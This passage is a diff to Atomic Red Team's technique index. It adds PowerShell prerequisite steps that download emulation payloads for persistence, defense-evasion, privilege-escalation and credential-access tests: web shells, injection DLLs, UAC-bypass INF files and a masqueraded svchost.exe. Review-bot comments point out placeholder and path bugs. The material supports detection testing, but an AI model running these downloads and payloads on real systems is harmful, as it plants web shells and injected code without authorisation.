-ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: powershell elevation_required: true 
@@ -4925,6 +4953,15 @@ persistence: description: Path of Web Shell type: path default: PathToAtomicsFolder\T1100\src\ + dependency_executor_name: powershell + dependencies: + - description: Web shell must exist on disk at specified location (#{web_shells}) + prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" executor: name: command_prompt command: 'xcopy #{web_shells} #{web_shell_path} @@ -5935,6 +5972,13 @@ defense-evasion: description: Path to the INF file type: path default: PathToAtomicsFolder\T1191\src\T1191.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_file_path}) + prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191.inf" -OutFile "#{inf_file_path}" executor: name: command_prompt elevation_required: false 
@@ -5953,6 +5997,13 @@ defense-evasion: description: Path to the INF file type: path default: PathToAtomicsFolder\T1191\src\T1191_uacbypass.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_file_uac}) + prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: name: command_prompt elevation_required: false @@ -6151,11 +6202,18 @@ defense-evasion: input_file: description: C# code that launches calc.exe from a hidden cmd.exe Window type: file - default: "$PathToAtomicsFolder\\T1500\\src\\calc.cs" + default: PathToAtomicsFolder\T1500\src\calc.cs output_file: description: Output compiled binary type: file default: C:\Windows\Temp\T1500.exe + dependency_executor_name: powershell + dependencies: + - description: C# file must exist on disk at specified location (#{input_file}) + prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1500/src/calc.cs" -OutFile "#{input_file}" executor: name: command_prompt elevation_required: false 
@@ -6239,6 +6297,13 @@ defense-evasion: description: Local .chm payload type: path default: PathToAtomicsFolder\T1223\src\T1223.chm + dependency_executor_name: powershell + dependencies: + - description: The payload must exist on disk at specified location (#{local_chm_file}) + prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1223/src/T1223.chm" -OutFile "#{local_chm_file}" executor: name: command_prompt elevation_required: false @@ -6457,6 +6522,13 @@ defense-evasion: description: path to cpl file type: path default: PathToAtomicsFolder\T1196\bin\calc.cpl + dependency_executor_name: powershell + dependencies: + - description: Cpl file must exist on disk at specified location (#{cpl_file_path}) + prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1196/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: name: command_prompt elevation_required: false @@ -9063,6 +9135,13 @@ defense-evasion: description: location of the source code to compile type: Path default: PathToAtomicsFolder\T1118\src\T1118.cs + dependency_executor_name: powershell + dependencies: + - description: Source code must exist on disk at specified location (#{source}) + prereq_command: 'if (Test-Path #{source}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" executor: name: command_prompt elevation_required: false 
@@ -9084,6 +9163,13 @@ defense-evasion: description: location of the source code to compile type: Path default: PathToAtomicsFolder\T1118\src\T1118.cs + dependency_executor_name: powershell + dependencies: + - description: Source code must exist on disk at specified location (#{source}) + prereq_command: 'if (Test-Path #{source}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" executor: name: command_prompt elevation_required: false @@ -9357,11 +9443,18 @@ defense-evasion: inputfile: description: path of file to copy type: path - default: "$PathToAtomicsFolder\\T1036\\bin\\t1036.exe" + default: PathToAtomicsFolder\T1036\bin\t1036.exe outputfile: description: path of file to execute type: path default: ($env:TEMP + "\svchost.exe") + dependency_executor_name: powershell + dependencies: + - description: Exe file to copy must exist on disk at specified location (#{inputfile}) + prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}" executor: name: powershell elevation_required: false @@ -10347,7 +10440,7 @@ defense-evasion: dll_path: description: Path of the dll to inject type: string - default: "$PathToAtomicsFolder\\T1502\\bin\\calc.dll" + default: PathToAtomicsFolder\T1502\bin\calc.dll dll_process_name: description: Name of the created process from the injected dll type: string 
@@ -10360,6 +10453,13 @@ defense-evasion: description: Name of the process to spawn type: string default: iexplore + dependency_executor_name: powershell + dependencies: + - description: DLL to inject must exist on disk at specified location (#{dll_path}) + prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1502/bin/calc.dll" -OutFile "#{dll_path}" executor: name: powershell elevation_required: false @@ -10695,6 +10795,13 @@ defense-evasion: description: PID of input_arguments type: Int default: "(get-process spoolsv).id" + dependency_executor_name: powershell + dependencies: + - description: Utility to inject must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" executor: name: powershell elevation_required: true @@ -10869,6 +10976,14 @@ defense-evasion: description: Location of the CSharp source_file type: Path default: PathToAtomicsFolder\T1121\src\T1121.cs + dependency_executor_name: powershell + dependencies: + - description: The CSharp source file must exist on disk at specified location + (#{source_file}) + prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" executor: name: command_prompt elevation_required: false 
@@ -10894,6 +11009,14 @@ defense-evasion: description: Location of the CSharp source_file type: Path default: PathToAtomicsFolder\T1121\src\T1121.cs + dependency_executor_name: powershell + dependencies: + - description: The CSharp source file must exist on disk at specified location + (#{source_file}) + prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" executor: name: powershell elevation_required: false @@ -10988,6 +11111,13 @@ defense-evasion: description: Name of the local file, include path. type: Path default: PathToAtomicsFolder\T1117\RegSvr32.sct + dependency_executor_name: powershell + dependencies: + - description: Regsvr32.exe must exist on disk at specified location (#(unknown)) + prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/RegSvr32.sct" -OutFile "#(unknown)" executor: name: command_prompt elevation_required: false 
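Review bot: The T1117 hunk (`@@ -10988,6 +11111,13 @@`) emits the literal placeholder `#(unknown)` in place of the input-argument name — `prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1}'` and `-OutFile "#(unknown)"` — so the check tests a file literally named `#(unknown)` and the download would be written under that name rather than to the .sct path the test uses; the same placeholder appears in the T1127 hunk and again in the second T1117 .sct hunk later in this file. The `description: Regsvr32.exe must exist on disk at specified location` also names the wrong artifact, since the block fetches `T1117/RegSvr32.sct`, not regsvr32.exe. Because this file is generated, the unresolved variable presumably originates in the source atomic YAML for T1117 and T1127 (the argument that holds the .sct / .csproj path), which is where it should be corrected before the generator is re-run.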
@@ -11024,6 +11154,14 @@ defense-evasion: description: Name of DLL to Execute, DLL Should export DllRegisterServer type: Path default: PathToAtomicsFolder\T1117\bin\AllTheThingsx86.dll + dependency_executor_name: powershell + dependencies: + - description: AllTheThingsx86.dll must exist on disk at specified location + (#{dll_name}) + prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" executor: name: command_prompt elevation_required: false @@ -11258,6 +11396,13 @@ defense-evasion: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false 
@@ -11276,6 +11421,13 @@ defense-evasion: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -11294,6 +11446,13 @@ defense-evasion: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false 
@@ -11313,6 +11472,13 @@ defense-evasion: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -11549,6 +11715,13 @@ defense-evasion: description: PID of process receiving injection type: string default: 1000 + dependency_executor_name: powershell + dependencies: + - description: T1218.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: name: command_prompt elevation_required: true 
@@ -11584,6 +11757,13 @@ defense-evasion: description: DLL to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + dependency_executor_name: powershell + dependencies: + - description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: name: command_prompt command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} @@ -11600,6 +11780,11 @@ defense-evasion: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi + dependency_executor_name: powershell + dependencies: + - description: T1218.msi must exist on disk at specified location (#{msi_payload}) + prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}' + get_prereq_command: Write-Host "You must provide your own MSI" executor: name: command_prompt command: 'msiexec.exe /q /i "#{msi_payload}" @@ -11634,6 +11819,13 @@ defense-evasion: description: DLL to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + dependency_executor_name: powershell + dependencies: + - description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: name: command_prompt command: 'msiexec.exe /y "#{dll_payload}" 
@@ -11650,6 +11842,13 @@ defense-evasion: description: DLL to execute type: Path default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll + dependency_executor_name: powershell + dependencies: + - description: T1218-2.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: name: command_prompt command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} @@ -11667,6 +11866,13 @@ defense-evasion: description: Local location of inf file type: string default: PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false 
@@ -12189,6 +12395,13 @@ defense-evasion: description: Location of the project file type: Path default: PathToAtomicsFolder\T1127\src\T1127.csproj + dependency_executor_name: powershell + dependencies: + - description: Project file must exist on disk at specified location (#(unknown)) + prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/T1127.csproj" -OutFile "#(unknown)" executor: name: command_prompt elevation_required: false @@ -12396,6 +12609,18 @@ defense-evasion: description: Location of the test XSL script file on the local filesystem. type: Path default: PathToAtomicsFolder\T1220\src\msxslscript.xsl + dependency_executor_name: powershell + dependencies: + - description: XML file must exist on disk at specified location (#{xmlfile}) + prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" + - description: XSL file must exist on disk at specified location (#{xslfile}) + prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" executor: name: command_prompt command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} 
@@ -12439,6 +12664,13 @@ defense-evasion: description: Location of the test XSL script file on the local filesystem. type: path default: PathToAtomicsFolder\T1220\src\wmicscript.xsl + dependency_executor_name: powershell + dependencies: + - description: XSL file must exist on disk at specified location (#{local_xsl_file}) + prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: name: command_prompt command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file} @@ -13032,6 +13264,13 @@ privilege-escalation: description: Path to the shim databaase file type: String default: PathToAtomicsFolder\T1138\src\AtomicShimx86.sdb + dependency_executor_name: powershell + dependencies: + - description: Shim database file must exist on disk at specified location (#{file_path}) + prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1138/src/AtomicShimx86.sdb" -OutFile "#{file_path}" executor: name: command_prompt elevation_required: true 
@@ -13715,6 +13954,13 @@ privilege-escalation: description: TLS Server To Test Get Request type: Url default: https://www.example.com + dependency_executor_name: powershell + dependencies: + - description: T1179x64.dll must exist on disk at specified location (#{file_name}) + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "#{file_name}" executor: name: powershell elevation_required: true @@ -14038,6 +14284,13 @@ privilege-escalation: description: Name of the Service type: String default: AtomicTestService + dependency_executor_name: powershell + dependencies: + - description: Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: command_prompt elevation_required: true @@ -14062,6 +14315,13 @@ privilege-escalation: description: Name of the Service type: String default: AtomicTestService + dependency_executor_name: powershell + dependencies: + - description: Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: powershell elevation_required: true 
@@ -14161,7 +14421,7 @@ privilege-escalation: dll_path: description: Path of the dll to inject type: string - default: "$PathToAtomicsFolder\\T1502\\bin\\calc.dll" + default: PathToAtomicsFolder\T1502\bin\calc.dll dll_process_name: description: Name of the created process from the injected dll type: string @@ -14174,6 +14434,13 @@ privilege-escalation: description: Name of the process to spawn type: string default: iexplore + dependency_executor_name: powershell + dependencies: + - description: DLL to inject must exist on disk at specified location (#{dll_path}) + prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1502/bin/calc.dll" -OutFile "#{dll_path}" executor: name: powershell elevation_required: false @@ -14531,6 +14798,13 @@ privilege-escalation: description: PID of input_arguments type: Int default: "(get-process spoolsv).id" + dependency_executor_name: powershell + dependencies: + - description: Utility to inject must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}" executor: name: powershell elevation_required: true 
@@ -15320,6 +15594,15 @@ privilege-escalation: description: Path of Web Shell type: path default: PathToAtomicsFolder\T1100\src\ + dependency_executor_name: powershell + dependencies: + - description: Web shell must exist on disk at specified location (#{web_shells}) + prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" executor: name: command_prompt command: 'xcopy #{web_shells} #{web_shell_path} @@ -16476,10 +16759,6 @@ discovery: supported_platforms: - windows input_arguments: - input_url: - description: URL to source code in Atomic-Red-Team git repository - type: Url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs input_source_code: description: Path to source of C# code type: path @@ -16492,7 +16771,9 @@ discovery: dependencies: - description: T1010.cs must exist on disk at specified location (#{input_source_code}) prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1}' - get_prereq_command: Invoke-WebRequest "#{input_URL}" -OutFile "#{input_source_code}" + get_prereq_command: |- + New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" executor: name: command_prompt elevation_required: false 
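Review bot: In the T1100 hunk (`@@ -15320,6 +15594,15 @@`) the dependency treats `#{web_shells}` as a file, but its default `PathToAtomicsFolder\T1100\src\` is a directory: `Test-Path #{web_shells}` passes as soon as the directory exists even when none of the three files have been fetched, and `split-path` of a directory path appears to yield its parent, so `New-Item` would create the T1100 folder rather than `src` and the following `-OutFile "#{web_shells}/b.jsp"` writes would fail if `src` is absent. The check should test the files and the directory should be created directly, e.g. `prereq_command: 'if ((Test-Path "#{web_shells}\b.jsp") -and (Test-Path "#{web_shells}\test.jsp") -and (Test-Path "#{web_shells}\cmd.aspx")) {exit 0} else {exit 1}'` with `New-Item -Type Directory "#{web_shells}" -ErrorAction ignore | Out-Null`. The second download fetches `src/tests.jsp` but saves it as `test.jsp`; if the repository file is really named `tests.jsp`, the local name should match so the check, the download and the test agree on one filename.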
@@ -18441,7 +18722,9 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist' prereq_command: if (Test-Path "#{port_file}") {exit 0} else {exit 1} - get_prereq_command: Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" + get_prereq_command: |- + New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" executor: name: powershell elevation_required: false @@ -20180,6 +20463,13 @@ credential-access: description: TLS Server To Test Get Request type: Url default: https://www.example.com + dependency_executor_name: powershell + dependencies: + - description: T1179x64.dll must exist on disk at specified location (#{file_name}) + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "#{file_name}" executor: name: powershell elevation_required: true @@ -20697,6 +20987,13 @@ credential-access: description: Path to DLL to be installed and registered type: Path default: PathToAtomicsFolder\T1174\src\AtomicPasswordFilter.dll + dependency_executor_name: powershell + dependencies: + - description: AtomicPasswordFilter.dll must exist on disk at specified location + (#{input_dll}) + prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}' + get_prereq_command: Write-Host "You must provide your own password filter + dll" executor: name: powershell elevation_required: true 
@@ -20988,6 +21285,13 @@ execution: description: Path to the INF file type: path default: PathToAtomicsFolder\T1191\src\T1191.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_file_path}) + prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191.inf" -OutFile "#{inf_file_path}" executor: name: command_prompt elevation_required: false @@ -21006,6 +21310,13 @@ execution: description: Path to the INF file type: path default: PathToAtomicsFolder\T1191\src\T1191_uacbypass.inf + dependency_executor_name: powershell + dependencies: + - description: INF file must exist on disk at specified location (#{inf_file_uac}) + prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: name: command_prompt elevation_required: false @@ -21144,6 +21455,13 @@ execution: description: Local .chm payload type: path default: PathToAtomicsFolder\T1223\src\T1223.chm + dependency_executor_name: powershell + dependencies: + - description: The payload must exist on disk at specified location (#{local_chm_file}) + prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1223/src/T1223.chm" -OutFile "#{local_chm_file}" executor: name: command_prompt elevation_required: false 
@@ -21313,6 +21631,13 @@ execution: description: path to cpl file type: path default: PathToAtomicsFolder\T1196\bin\calc.cpl + dependency_executor_name: powershell + dependencies: + - description: Cpl file must exist on disk at specified location (#{cpl_file_path}) + prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1196/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: name: command_prompt elevation_required: false @@ -21497,6 +21822,13 @@ execution: description: location of the source code to compile type: Path default: PathToAtomicsFolder\T1118\src\T1118.cs + dependency_executor_name: powershell + dependencies: + - description: Source code must exist on disk at specified location (#{source}) + prereq_command: 'if (Test-Path #{source}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" executor: name: command_prompt elevation_required: false @@ -21518,6 +21850,13 @@ execution: description: location of the source code to compile type: Path default: PathToAtomicsFolder\T1118\src\T1118.cs + dependency_executor_name: powershell + dependencies: + - description: Source code must exist on disk at specified location (#{source}) + prereq_command: 'if (Test-Path #{source}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/T1118.cs" -OutFile "#{source}" executor: name: command_prompt elevation_required: false 
